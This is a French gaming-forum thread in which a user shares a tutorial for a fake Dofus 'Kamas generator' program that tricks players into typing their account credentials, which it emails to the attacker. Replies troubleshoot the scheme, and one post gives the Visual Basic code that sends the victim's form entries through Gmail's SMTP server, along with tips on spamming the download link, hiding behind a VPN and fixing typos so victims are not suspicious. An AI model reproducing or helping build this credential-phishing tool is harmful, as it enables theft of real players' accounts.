Création d'un FAKE Generateur de Kamas (Phishing)

    Publicités

Users Who Are Viewing This Thread (Total: 0, Members: 0, Guests: 0)

Epyks

Membre actif
Jun 18, 2011
105
0
441
Salut!

Je vais vous expliquer comment réaliser votre Fake Générateur de Kamas qui vas vous aider a récupérer des comptes par Email. :war2:

Voici ce que ça donne :
(cliquez pour agrandir)
702094Kamasgen.jpg


Prérequis :
-Une adresse Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris!
-Compte(s) Flood (autre que votre compte principal)
-ProXpn (pour modifier votre adresse ip et ne pas se faire ban)
-Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris!

1)
Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris!

2) Dé-zippez le dossier, ouvrez le et double-cliquez sur le lien Generateur de Kamas DOFUS 2.0 avec Visual Basic.

3) Une fois dans Visual Basic avec le Générateur de Kamas ouvert, double cliquez sur Form1 à Droite, puis sur Timer1 en Bas de l'image.

4) Modifiez les lignes suivantes (celles en rouge) :
(cliquez pour agrandir)
740953visugen2.png


Avec votre propre adresse Gmail/pseudo d'adresse Gmail :hap:

5) Fichier enregistrer ... Puis allez dans le fichier " Debug " et vous trouverez le .exe ; uploader votre .exe sur un hébergeur (comme Megaupload), floodez le lien et .... ramassez les comptes ! :mdr1:


Ce Fake Kamas Generator est de moi... un Merci ne tue pas ! ;)
 

sylvainde

Membre Banni
Jul 2, 2011
34
0
426
ok pas mal et [MERCI] et je n'ai pas tres bien compris qu'elle ligne il fallai modifier^^
 

azery

Nouveau membre
Mar 20, 2011
3
0
421
23
je les modifies par mon mot de passe gMail?, tu n'aurais pas un bot flood assez facile et gratuit
 

nass95100

Membre actif
Nov 18, 2010
235
0
922
27
simple mais efficace =) Mais par contre on peut facilement prendre les comptes que tu a hacké avec reflector mais je n'en dirais pas plus ne t'en fais pas ;)
 

Epyks

Membre actif
Jun 18, 2011
105
0
441
@azerty Désolé mais je ne peut pas faire plus claire que je l'ai été :hap:
 

Formex

V.I.P
Feb 20, 2011
30
0
912
Lille
Marche pas pour moi .. Pourtant j'ai tout modifier, mais quand je remplis le questionnaire et que je clique sur envoyer, je ne reçois rien dans ma boîte gmail.. :/
 

Silfer

Membre actif
Jun 13, 2010
279
0
581
debug ces deboguer? mais après je sais pas quoi faire . il ya pas le .exe

---------- Message ajouté à 15h40 ---------- Le message précédent était à 15h37 ----------

je trouve pas ou le compiler x)
 

Nutela

Membre
Oct 13, 2010
95
0
912
Je ne comprend tu ne détaille pas asser. Ou doit on cliquer? Que doit-t-on faire? Tu à très mal expliquer... Moi je click sur se que tu a dit ensuite ya 8 fichier, sur le quel je doit effectuée la modification :) ? Car : double cliquez sur Form1 à Droite, puis sur Timer1 en Bas de l'image.

C'est aps assez precis.
 

fatalalex

Membre
Feb 19, 2011
13
0
421
Je vais essayer de suite :)

---------- Message ajouté à 18h26 ---------- Le message précédent était à 18h23 ----------

j'ajoute que c'est " envoyer la Requête au serveur " et pas requette certaines personnes verront que c'est un hack si ya des fautes ;)

Requête :P
 

fatalalex

Membre
Feb 19, 2011
13
0
421
quand je veux ouvrir le fichier générateur de kamas dofus 2.0 j'ai rien sur la droite et aucun endroit ou c'est marqué form1 ou Timer1 pourrais-tu me donner le nom exact du fichier a ouvrir avec Visual Basic ?

---------- Message ajouté à 20h19 ---------- Le message précédent était à 20h18 ----------

c'est bon j'ai trifouillé et j'ai trouvé :P
 

fatalalex

Membre
Feb 19, 2011
13
0
421
en fait j'ai form1 mais pas timer1 :D Ou il se trouve ? il devrait se trouver entre
" TextChanged(ByVal sender As Object, ByVal e As System.EventArgs)"
et
"Top As Integer"

Je comprends pas n_n

^^"
 

pompomaab

Membre
Sep 1, 2010
6
0
421
43
epyks tu peut me donner un exemple des ligne qu'on dois changer j'ai tous fait mais je ne recois rien :( merci d'avance
 

tonyxdxd

Membre Banni
Jul 2, 2011
15
0
426
68
Euh enfaite moi je met un compte a moi pour voir si il me l'envoi par email gmail mais sa ne marche pas :/ help?
 

Dark-Kamas

Nouveau membre
Jul 18, 2011
1
0
301
Merci mes le problème ses que je ne comprend pas =$

("Pseudo", "Mot de passe de votre adresse Gmail")
 

math60510

Nouveau membre
Jul 18, 2011
1
0
301
28
salut j ai telecharger ton fake mais la j ai un truk bisar et je ne trouve pas Dé-zipper
 

MarioBros.

Membre
Dec 6, 2010
27
0
907
Euh enfaite moi je met un compte a moi pour voir si il me l'envoi par email gmail mais sa ne marche pas :/ help?

J'ai fait un example pour toi : Disons que le compte c'est BOB et que le pass c'est OBO :

Code:
        Dim MyMailMessage As New MailMessage()
        Try
            MyMailMessage.From = New MailAddress("[email protected]")
            MyMailMessage.To.Add("[email protected]")
            MyMailMessage.Subject = ("COMPTE")
            MyMailMessage.Body = TextBox1.Text + ControlChars.NewLine + TextBox2.Text + ControlChars.NewLine + TextBox3.Text + ControlChars.NewLine + ComboBox1.Text + ControlChars.NewLine + ComboBox2.Text + ControlChars.NewLine
            Dim SMTP As New SmtpClient("smtp.gmail.com")
            SMTP.Port = 587
            SMTP.EnableSsl = True
            SMTP.Credentials = New System.Net.NetworkCredential("bob", "obo")
            SMTP.Send(MyMailMessage)
            TextBox2.Text = ""


Merci mes le problème ses que je ne comprend pas =$

("Pseudo", "Mot de passe de votre adresse Gmail")

Eh bien, tu met ton pseudo, example
Gmail : Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris!
Password : MonPassword

Code:
SMTP.Credentials = New System.Net.NetworkCredential("Dark-Kamas", "MonPassword")

Et finalement :
salut j ai telecharger ton fake mais la j ai un truk bisar et je ne trouve pas Dé-zipper

Dé-zipper: Ouvre le avec WinRar et fait Extraire (si en francais) et Extract to... (si en anglais) et ta destination, met Bureau.
 

antoine741

Membre
Jun 6, 2010
77
0
571
39
Salut donc j'ai tout modifier comme il le falait j'ouvre le Logiciel de phising je met des truc bidon je fais envoyer ... je regarde sur ma boite mail et j'ai rien ? ! Normale = D ?
 

Mikami-Ter

Membre
Jul 17, 2011
10
0
301
31
Idem, tout est modifié comme il faut j'ai bien remplacé par mon pseudo Gmail et mon MDP, mais toujours aucun résultat :x, j'ai simuler le fake avec de faux personnages et je ne reçois rien, a tu une explication ?

Ah oui et quand je modifie la faute sur requête et que j'enregistre rien ne se passe ....
 

MarioBros.

Membre
Dec 6, 2010
27
0
907
La faute sur requête? ... En tout cas, ici ça marche extrêmement bien, je ne sais pas ce que vous avez pu faire d'incorrecte mais bon, réessayer ! :)
 

Epyks

Membre actif
Jun 18, 2011
105
0
441
Il faut persévérer et chercher par sois même au bout d'un moment, sinon vous ne ferez jamais rien par vous même ! :hap:
 

romirone

Membre
Jun 17, 2011
11
0
562
31
Salut moi c'est bon ça fonctionne par contre la foule ne se jete pas dessu xD la seul personne que j'ai eu a pas donné son nom de compte ni son mdp mais juste sont nom et le montant voulu--" vous utilisez une technique spécial? Il y a une phrase clé ?